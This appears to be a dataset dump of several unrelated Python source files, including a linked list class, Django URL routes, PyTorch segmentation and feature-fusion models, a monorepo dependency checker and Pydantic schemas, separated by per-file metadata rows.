sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(serverAddress)
sock.send(message.encode('utf-8'))
#r = sock.recv(1024)
print('Receiving message "{}" from server.\n'.format(
sock.recv(1024).decode()))
sock.close()
else:
print('You have to enter something.....\n')
continue
except KeyboardInterrupt:
print('\n')
# sock.close()
if __name__ == '__main__':
main()
| 28.794118
| 95
| 0.507661
| 107
| 979
| 4.53271
| 0.626168
| 0.037113
| 0.049485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017828
| 0.369765
| 979
| 33
| 96
| 29.666667
| 0.768233
| 0.150153
| 0
| 0
| 0
| 0
| 0.188634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.086957
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903025199c8cb18d7b43068916c16d96cb4139f2
| 2,967
|
py
|
Python
|
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
0x06-python-classes/100-singly_linked_list.py
|
Trice254/alx-higher_level_programming
|
b49b7adaf2c3faa290b3652ad703914f8013c67c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""
Module 100-singly_linked_list
Defines class Node (with private data and next_node)
Defines class SinglyLinkedList (with private head and public sorted_insert)
"""
class Node:
"""
class Node definition
Args:
data (int): private
next_node : private; can be None or Node object
Functions:
__init__(self, data, next_node=None)
data(self)
data(self, value)
next_node(self)
next_node(self, value)
"""
def __init__(self, data, next_node=None):
"""
Initializes node
Attributes:
data (int): private
next_node : private; can be None or Node object
"""
self.data = data
self.next_node = next_node
@property
def data(self):
""""
Getter
Return: data
"""
return self.__data
@data.setter
def data(self, value):
"""
Setter
Args:
value: sets data to value if int
"""
if type(value) is not int:
raise TypeError("data must be an integer")
else:
self.__data = value
@property
def next_node(self):
""""
Getter
Return: next_node
"""
return self.__next_node
@next_node.setter
def next_node(self, value):
"""
Setter
Args:
value: sets next_node if value is next_node or None
"""
if type(value) is not Node and value is not None:
raise TypeError("next_node must be a Node object")
else:
self.__next_node = value
class SinglyLinkedList:
"""
class SinglyLinkedList definition
Args:
head: private
Functions:
__init__(self)
sorted_insert(self, value)
"""
def __init__(self):
"""
Initializes singly linked list
Attributes:
head: private
"""
self.__head = None
def __str__(self):
"""
String representation of singly linked list needed to print
"""
string = ""
tmp = self.__head
while tmp is not None:
string += str(tmp.data)
tmp = tmp.next_node
if tmp is not None:
string += "\n"
return string
def sorted_insert(self, value):
"""
Inserts new nodes into singly linked list in sorted order
Args:
value: int data for node
"""
new = Node(value)
if self.__head is None:
self.__head = new
return
tmp = self.__head
if new.data < tmp.data:
new.next_node = self.__head
self.__head = new
return
while (tmp.next_node is not None) and (new.data > tmp.next_node.data):
tmp = tmp.next_node
new.next_node = tmp.next_node
tmp.next_node = new
return
| 23.179688
| 78
| 0.532524
| 340
| 2,967
| 4.432353
| 0.202941
| 0.138023
| 0.043796
| 0.023889
| 0.272064
| 0.135368
| 0.066357
| 0.066357
| 0.066357
| 0.066357
| 0
| 0.002193
| 0.385238
| 2,967
| 127
| 79
| 23.362205
| 0.824013
| 0.343108
| 0
| 0.265306
| 0
| 0
| 0.035692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163265
| false
| 0
| 0
| 0
| 0.326531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90303a8de55d76b20b74b604783236c6d15111a5
| 310
|
py
|
Python
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 20
|
2016-05-15T10:39:53.000Z
|
2022-03-29T00:06:06.000Z
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 3
|
2017-05-27T16:44:01.000Z
|
2019-01-02T21:02:59.000Z
|
BI-IOS/semester-project/webapp/beecon/campaigns/urls.py
|
josefdolezal/fit-cvut
|
6b6abea4232b946246d33290718d6c5007926b63
|
[
"MIT"
] | 11
|
2018-08-22T21:16:32.000Z
|
2021-04-10T22:42:34.000Z
|
from django.conf.urls import url
from . import views
app_name = 'campaigns'
urlpatterns = [
url( r'^$', views.JsonView.response, name='index' ),
url( r'^(?P<app_code>[a-zA-Z0-9]+)/info/$', views.info, name='info' ),
url( r'^(?P<app_code>[a-zA-Z0-9]+)/services/$', views.services, name='services' ),
]
| 25.833333
| 84
| 0.632258
| 48
| 310
| 4.020833
| 0.479167
| 0.062176
| 0.051813
| 0.082902
| 0.186529
| 0.186529
| 0.186529
| 0.186529
| 0.186529
| 0
| 0
| 0.01476
| 0.125806
| 310
| 11
| 85
| 28.181818
| 0.697417
| 0
| 0
| 0
| 0
| 0
| 0.322581
| 0.232258
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9032381dcc04f711d03772a06dc91a54a4d1b366
| 5,802
|
py
|
Python
|
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | 3
|
2020-05-16T23:59:57.000Z
|
2021-06-14T01:59:41.000Z
|
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | null | null | null |
models/joint_representation.py
|
ybCliff/VideoCaptioning
|
93fc3b095c970e51e1e24909163a827df98d6ef3
|
[
"MIT"
] | 3
|
2020-05-17T00:01:01.000Z
|
2020-07-28T18:04:05.000Z
|
import torch
import torch.nn as nn
class Gated_Sum(nn.Module):
def __init__(self, opt):
super(Gated_Sum, self).__init__()
hidden_size = opt['dim_hidden']
nf = opt.get('num_factor', 512)
self.hidden_size = hidden_size
self.num_feats = len(opt['modality']) - sum(opt['skip_info'])
#self.emb_weight = Parameter(torch.Tensor(self.num_feats * hidden_size, hidden_size))
#self.emb_bias = Parameter(torch.Tensor(self.num_feats * hidden_size))
self.weight_a = Parameter(torch.Tensor(self.num_feats * hidden_size, nf))
self.weight_b = Parameter(torch.Tensor(nf, self.num_feats))
self.weight_c = Parameter(torch.Tensor(nf, hidden_size))
self.bias = Parameter(torch.Tensor(self.num_feats * hidden_size))
self.dropout = nn.Dropout(0.5)
self.reset_parameters()
def reset_parameters(self):
stdv = 1.0 / math.sqrt(self.hidden_size)
for weight in self.parameters():
weight.data.uniform_(-stdv, stdv)
def get_gated_result(self, weight, bias, feats, index):
assert len(feats) == self.num_feats
#assert len(feats.shape)
#ew = self.emb_weight.chunk(self.num_feats, 0)
#eb = self.emb_bias.chunk(self.num_feats, 0)
w = weight.chunk(self.num_feats, 0)
b = bias.chunk(self.num_feats, 0)
res = []
for i in range(self.num_feats):
#if i == index:
# emb = F.linear(feats[i], ew[i], eb[i])
res.append(F.linear(self.dropout(feats[i]), w[i], b[i]))
#res.append(F.linear(feats[i], w[i], b[i]))
gated_result = F.sigmoid(torch.stack(res, 0).sum(0)) * feats[index]
#gated_result = F.sigmoid(torch.stack(res, 0).sum(0)) * emb
return gated_result
def forward(self, encoder_outputs):
bsz, seq_len, _ = encoder_outputs[0].shape
feats = [item.contiguous().view(bsz * seq_len, -1) for item in encoder_outputs]
#feats = [self.dropout(item.contiguous().view(bsz * seq_len, -1)) for item in encoder_outputs]
gated_results = []
for i in range(self.num_feats):
tag = torch.zeros(self.num_feats, 1).to(feats[0].device)
tag[i] = 1
#query = feats[i].mean(0).unsqueeze(0).repeat(self.num_feats, 1) # [3, dim]
#key = torch.stack(feats, 1).mean(0) # [3, dim]
#tag = F.cosine_similarity(query, key).unsqueeze(1)
weight_mid = torch.mm(self.weight_b, tag)
weight_mid = torch.diag(weight_mid.squeeze(1))
weight = torch.mm(torch.mm(self.weight_a, weight_mid), self.weight_c)
gated_results.append(self.get_gated_result(weight, self.bias, feats, i))
gated_results = torch.stack(gated_results, 0).sum(0)
gated_results = gated_results.contiguous().view(bsz, seq_len, self.hidden_size)
return gated_results
class Joint_Representaion_Learner(nn.Module):
def __init__(self, feats_size, opt):
super(Joint_Representaion_Learner, self).__init__()
self.encoder_type = opt['encoder_type']
self.decoder_type = opt['decoder_type']
self.addition = opt.get('addition', False)
self.temporal_concat = opt.get('temporal_concat', False)
self.opt = opt
self.att = None
if opt['multi_scale_context_attention']:
from models.rnn import Multi_Scale_Context_Attention
self.att = Multi_Scale_Context_Attention(opt)
if opt.get('gated_sum', False):
self.att = Gated_Sum(opt)
self.bn_list = []
if not opt['no_encoder_bn']:
if self.addition:
feats_size = [feats_size[0]]
print(self.addition)
print(feats_size)
for i, item in enumerate(feats_size):
tmp_module = nn.BatchNorm1d(item)
self.bn_list.append(tmp_module)
self.add_module("bn%d"%(i), tmp_module)
def forward(self, encoder_outputs, encoder_hiddens):
if (self.decoder_type != 'ENSEMBLE' and self.encoder_type == 'GRU' and not self.opt.get('two_stream', False)) \
or self.encoder_type == 'IEL' \
or (self.encoder_type == 'IPE' and self.opt.get('MSLSTM', False)):
if isinstance(encoder_hiddens[0], tuple):
hx = []
cx = []
for h in encoder_hiddens:
hx.append(h[0])
cx.append(h[1])
encoder_hiddens = (torch.stack(hx, dim=0).mean(0), torch.stack(cx, dim=0).mean(0))
else:
encoder_hiddens = torch.stack(encoder_hiddens, dim=0).mean(0)
if self.att is not None:
encoder_outputs = self.att(encoder_outputs)
if self.addition:
assert isinstance(encoder_outputs, list)
encoder_outputs = torch.stack(encoder_outputs, dim=0).mean(0)
#encoder_outputs = torch.stack(encoder_outputs, dim=0).max(0)[0]
encoder_outputs = encoder_outputs if isinstance(encoder_outputs, list) else [encoder_outputs]
if len(self.bn_list):
assert len(encoder_outputs) == len(self.bn_list)
for i in range(len(encoder_outputs)):
batch_size, seq_len, _ = encoder_outputs[i].shape
encoder_outputs[i] = self.bn_list[i](encoder_outputs[i].contiguous().view(batch_size * seq_len, -1)).view(batch_size, seq_len, -1)
if self.temporal_concat:
assert isinstance(encoder_outputs, list)
encoder_outputs = torch.cat(encoder_outputs, dim=1)
#print(encoder_outputs.shape)
return encoder_outputs, encoder_hiddens
| 39.739726
| 146
| 0.601344
| 771
| 5,802
| 4.30869
| 0.178988
| 0.109573
| 0.054184
| 0.028898
| 0.276039
| 0.219446
| 0.173691
| 0.159843
| 0.083082
| 0.083082
| 0
| 0.012114
| 0.274388
| 5,802
| 146
| 147
| 39.739726
| 0.77696
| 0.13909
| 0
| 0.06383
| 0
| 0
| 0.034545
| 0.005824
| 0
| 0
| 0
| 0
| 0.042553
| 1
| 0.06383
| false
| 0
| 0.031915
| 0
| 0.148936
| 0.021277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9034fc76134be07855830d17f0d402a691811b26
| 2,489
|
py
|
Python
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 26
|
2018-11-29T13:33:25.000Z
|
2021-11-22T18:45:19.000Z
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 14
|
2019-01-20T00:07:13.000Z
|
2020-07-15T13:19:29.000Z
|
scream/monorepo.py
|
r-kells/scream
|
3f5d325cd05a0f3eccc4b579b4929be49029ab09
|
[
"MIT"
] | 2
|
2019-02-25T17:31:47.000Z
|
2020-01-22T22:10:41.000Z
|
import collections
from scream.files import Docs, Scream, Tox
class Monorepo(object):
def __init__(self, root_dir):
self.root_dir = root_dir
self.config = Scream(self.root_dir)
def sync(self):
"""Used internally ensure monorepo maintains certain standards.
"""
self.config = Scream(self.root_dir)
Tox(self.config.packages).write(self.root_dir)
Docs(self.config.packages).write(self.root_dir)
def validate_mono_repo(self):
all_pypi_packages = self.get_all_pypi_packages()
warn_unpinned = self.warn_unpinned_packages(all_pypi_packages)
warn_dependency_conflict = self.warn_dependency_conflict(all_pypi_packages)
for package in self.config.packages:
self.intersect_warning(package.package_name, "has unpinned dependencies",
warn_unpinned, package.other_dependencies)
self.intersect_warning(package.package_name, "more than 1 package has a different version for",
warn_dependency_conflict, package.other_dependencies)
def warn_unpinned_packages(self, pypi_packages):
to_report_packages = []
for p in pypi_packages:
if "==" not in p:
to_report_packages.append(p)
return to_report_packages
def warn_dependency_conflict(self, pypi_packages):
to_report_packages = []
counts = version_counter(pypi_packages)
for p in pypi_packages:
if len(counts[(p.split("==")[0])]) > 1:
to_report_packages.append(p)
return to_report_packages
def get_all_pypi_packages(self):
p = []
for package in self.config.packages:
p.extend(package.other_dependencies)
return p
@staticmethod
def intersect_warning(name, description, list1, list2):
intersect = set(list1).intersection(set(list2))
if intersect:
print("Warning: Package {name} {description}: {intersect}.".format(
name=name,
description=description,
intersect=', '.join(intersect)
))
def version_counter(pypi_packages):
results = collections.defaultdict(set)
for p in pypi_packages:
try:
name, version = p.split("==")
except Exception:
name = p.split("==")[0]
version = 'LATEST'
results[name].update([version])
return results
| 34.09589
| 107
| 0.627561
| 280
| 2,489
| 5.335714
| 0.282143
| 0.096386
| 0.044177
| 0.02008
| 0.323963
| 0.311914
| 0.147256
| 0.064257
| 0.064257
| 0.064257
| 0
| 0.004469
| 0.280836
| 2,489
| 72
| 108
| 34.569444
| 0.830168
| 0.024106
| 0
| 0.232143
| 0
| 0
| 0.057581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.035714
| 0
| 0.267857
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9037bc76d22fa05dd0f3bfed5e08c4fd3d0cc516
| 538
|
py
|
Python
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 16
|
2020-03-19T15:12:28.000Z
|
2021-12-20T06:02:32.000Z
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 14
|
2020-03-23T03:57:00.000Z
|
2021-12-20T05:53:33.000Z
|
tbase/common/logger.py
|
iminders/TradeBaselines
|
26eb87f2bcd5f6ff479149219b38b17002be6a40
|
[
"MIT"
] | 7
|
2020-03-25T00:30:18.000Z
|
2021-01-31T18:45:09.000Z
|
import logging
import os
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[%(lineno)d] %(levelname)s %(message)s')
logger = logging.getLogger()
dir_name = os.path.join("/tmp", "tbase")
if not os.path.exists(dir_name):
os.makedirs(dir_name)
handler = logging.FileHandler(os.path.join(dir_name, "tbase.log"))
handler.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[%(lineno)d] %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
| 26.9
| 76
| 0.723048
| 74
| 538
| 5.202703
| 0.445946
| 0.072727
| 0.083117
| 0.088312
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0.218182
| 0
| 0
| 0.10223
| 538
| 19
| 77
| 28.315789
| 0.797101
| 0
| 0
| 0
| 0
| 0.133333
| 0.263941
| 0.089219
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903bd4a9af5949595a7b7528cd44f5048565dedd
| 10,070
|
py
|
Python
|
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
torchsrc/models/fcn32s_BN.py
|
yuankaihuo/MedPhysics
|
94d8c5357b76658b9b161b541a1f195c6550ce55
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsample_filter(size):
"""Make a 2D bilinear kernel suitable for upsampling"""
factor = (size + 1) // 2
if size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:size, :size]
filter = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
return torch.from_numpy(filter).float()
class FCN32s_BN(nn.Module):
def __init__(self, n_class=21, nodeconv=False):
super(FCN32s_BN, self).__init__()
self.nodeconv = nodeconv
self.conv1 = nn.Sequential(
# conv1
nn.Conv2d(3, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/2
)
self.conv2 = nn.Sequential(
# conv2
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(128, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/4
)
self.conv3 = nn.Sequential(
# conv3
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/8
)
self.conv4 = nn.Sequential(
# conv4
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/16
)
self.conv5 = nn.Sequential(
# conv5
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.Conv2d(512, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.ReLU(inplace=True),
nn.MaxPool2d(2, stride=2, ceil_mode=True), # 1/32
)
self.classifier = nn.Sequential(
# fc6
nn.Conv2d(512, 1024, 7, padding=1),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True),
nn.Dropout2d(),
# fc7
nn.Conv2d(1024, 1024, 1, padding=1),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True),
nn.Dropout2d(),
# score_fr
nn.Conv2d(1024, n_class, 1, padding=1),
)
self.maxPool_fc = nn.Sequential(
nn.MaxPool2d(2, stride=2, ceil_mode=True),
nn.BatchNorm2d(512),
)
self.upscore = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore4 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore3 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore2 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.upscore1 = nn.Sequential(
nn.ConvTranspose2d(n_class,n_class,4,stride=2,padding=1,output_padding=0,bias=True),
nn.BatchNorm2d(n_class),
)
self.score4 = nn.Sequential(
# torch.nn.Conv2d(in_channels, out_channels, kernel_size,
# stride=1, padding=0, dilation=1,
# groups=1, bias=True)
# batch x 1 x 28 x 28 -> batch x 512
nn.Conv2d(512, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score3 = nn.Sequential(
nn.Conv2d(256, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score2 = nn.Sequential(
nn.Conv2d(128, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self.score1 = nn.Sequential(
nn.Conv2d(64, n_class, 1, stride=1, padding=0),
nn.BatchNorm2d(n_class),
)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
m.weight.data.normal_(0, 0.01)
if m.bias is not None:
m.bias.data.zero_()
if isinstance(m, nn.ConvTranspose2d):
m.weight.data.normal_(0, 0.01)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
#print("input size = %s"%(str(x.size())))
hc1 = self.conv1(x)
#print("conv1 size = %s"%(str(hc1.size())))
hc2 = self.conv2(hc1)
#print("conv2 size = %s"%(str(hc2.size())))
hc3 = self.conv3(hc2)
#print("conv3 size = %s"%(str(hc3.size())))
hc4 = self.conv4(hc3)
#print("conv4 size = %s"%(str(hc4.size())))
hc5 = self.conv5(hc4)
#print("conv5 size = %s"%(str(hc5.size())))
hc5_f = self.maxPool_fc(hc5)
hc5_f = hc5_f.view(-1,8*8*512)
ha = self.classifier(hc5)
# #print("classifer size = %s"%(str(ha.size())))
hs4 = self.score4(hc4)
hd4 = self.upscore4(ha)
hf4 = torch.add(hs4, hd4)
# #print("deconv4 size = %s"%(str(hf4.size())))
hs3 = self.score3(hc3)
hd3 = self.upscore3(hf4)
hf3 = torch.add(hs3, hd3)
# #print("deconv3 size = %s"%(str(hf3.size())))
hs2 = self.score2(hc2)
hd2 = self.upscore2(hf3)
hf2 = torch.add(hs2, hd2)
# #print("deconv2 size = %s"%(str(hf2.size())))
hs1 = self.score1(hc1)
hd1 = self.upscore1(hf2)
hf1 = torch.add(hs1, hd1)
# #print("deconv1 size = %s"%(str(hf1.size())))
h = self.upscore(hf1)
# #print("output size = %s"%(str(h.size())))
return h
def copy_params_from_vgg16(self, vgg16, copy_classifier=True, copy_fc8=True, init_upscore=True):
self.conv1[0].weight.data = vgg16.features[0].weight.data;
self.conv1[0].bias.data = vgg16.features[0].bias.data;
self.conv1[3].weight.data = vgg16.features[2].weight.data;
self.conv1[3].bias.data = vgg16.features[2].bias.data;
self.conv2[0].weight.data = vgg16.features[5].weight.data;
self.conv2[0].bias.data = vgg16.features[5].bias.data;
self.conv2[3].weight.data = vgg16.features[7].weight.data;
self.conv2[3].bias.data = vgg16.features[7].bias.data;
self.conv3[0].weight.data = vgg16.features[10].weight.data;
self.conv3[0].bias.data = vgg16.features[10].bias.data;
self.conv3[3].weight.data = vgg16.features[12].weight.data;
self.conv3[3].bias.data = vgg16.features[12].bias.data;
self.conv3[6].weight.data = vgg16.features[14].weight.data;
self.conv3[6].bias.data = vgg16.features[14].bias.data;
self.conv4[0].weight.data = vgg16.features[17].weight.data;
self.conv4[0].bias.data = vgg16.features[17].bias.data;
self.conv4[3].weight.data = vgg16.features[19].weight.data;
self.conv4[3].bias.data = vgg16.features[19].bias.data;
self.conv4[6].weight.data = vgg16.features[21].weight.data;
self.conv4[6].bias.data = vgg16.features[21].bias.data;
self.conv5[0].weight.data = vgg16.features[24].weight.data;
self.conv5[0].bias.data = vgg16.features[24].bias.data;
self.conv5[3].weight.data = vgg16.features[26].weight.data;
self.conv5[3].bias.data = vgg16.features[26].bias.data;
self.conv5[6].weight.data = vgg16.features[28].weight.data;
self.conv5[6].bias.data = vgg16.features[28].bias.data;
if copy_classifier:
for i in [0, 3]:
l1 = vgg16.classifier[i]
l2 = self.classifier[i]
l2.weight.data = l1.weight.data.view(l2.weight.size())
l2.bias.data = l1.bias.data.view(l2.bias.size())
n_class = self.classifier[6].weight.size()[0]
if copy_fc8:
l1 = vgg16.classifier[6]
l2 = self.classifier[6]
l2.weight.data = l1.weight.data[:n_class, :].view(l2.weight.size())
l2.bias.data = l1.bias.data[:n_class]
if init_upscore:
# initialize upscore layer
c1, c2, h, w = self.upscore.weight.data.size()
assert c1 == c2 == n_class
assert h == w
weight = get_upsample_filter(h)
self.upscore.weight.data = \
weight.view(1, 1, h, w).repeat(c1, c2, 1, 1)
| 36.751825
| 101
| 0.523932
| 1,279
| 10,070
| 4.061767
| 0.139171
| 0.065448
| 0.085082
| 0.060635
| 0.47719
| 0.362079
| 0.350529
| 0.350529
| 0.344562
| 0.344562
| 0
| 0.092868
| 0.331678
| 10,070
| 273
| 102
| 36.886447
| 0.679049
| 0.090765
| 0
| 0.325123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009852
| 1
| 0.024631
| false
| 0
| 0.019704
| 0
| 0.059113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903c7397f31fe34f15318c7f6541642d7c880c26
| 1,067
|
py
|
Python
|
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | null | null | null |
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | 1
|
2021-09-05T15:39:56.000Z
|
2021-09-05T20:26:39.000Z
|
src/schema/models.py
|
prashant0079/metabolic_assignment
|
9660ef06e6015833e3c64de9c3fe34927c85ba49
|
[
"MIT"
] | null | null | null |
from pydantic import BaseModel
from typing import List
# The models used in this module are being used by the API
# for type validation using Pydantic as FastAPI is reliant
# on pydantic for Data validation
class GeographySchema(BaseModel):
id: int
short_name: str
name: str
class EntrySchema(BaseModel):
id: str
unit: str
geography_id: int
product_name: str
class Config:
orm_mode = True
class IndicatorSchema(BaseModel):
id: int
method: str
category: str
indicator: str
unit: str
class Config:
orm_mode = True
class ImpactSchema(BaseModel):
id: int
indicator_id: int
entry_id: int
coefficient: float
class Config:
orm_mode = True
class ImpactSchemaExtended(BaseModel):
id: int
indicator: IndicatorSchema
entry: EntrySchema
coefficient: float
class EntrySchemaExtended(BaseModel):
id: str
product_name: str
geography: GeographySchema
unit: str
impact: List[ImpactSchema]
class Config:
orm_mode = True
| 17.209677
| 58
| 0.68135
| 129
| 1,067
| 5.55814
| 0.403101
| 0.048815
| 0.078103
| 0.100418
| 0.152022
| 0.121339
| 0.083682
| 0
| 0
| 0
| 0
| 0
| 0.266167
| 1,067
| 61
| 59
| 17.491803
| 0.915709
| 0.135895
| 0
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04878
| 0
| 0.902439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
903de14b44d3f2b0857467165c0169f5dac5d5b8
| 404
|
py
|
Python
|
app.py
|
923310233/APk-Down-Load
|
e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | 2
|
2021-07-28T07:06:55.000Z
|
2021-07-28T07:08:19.000Z
|
app.py
|
923310233/APk-Down-Load
|
e7c3e4fdfbf9f7d8398d91ce0c5c028dfc685f3a
|
[
"MIT"
] | null | null | null |
app.py
|
923310233/APk-Down-Load
|
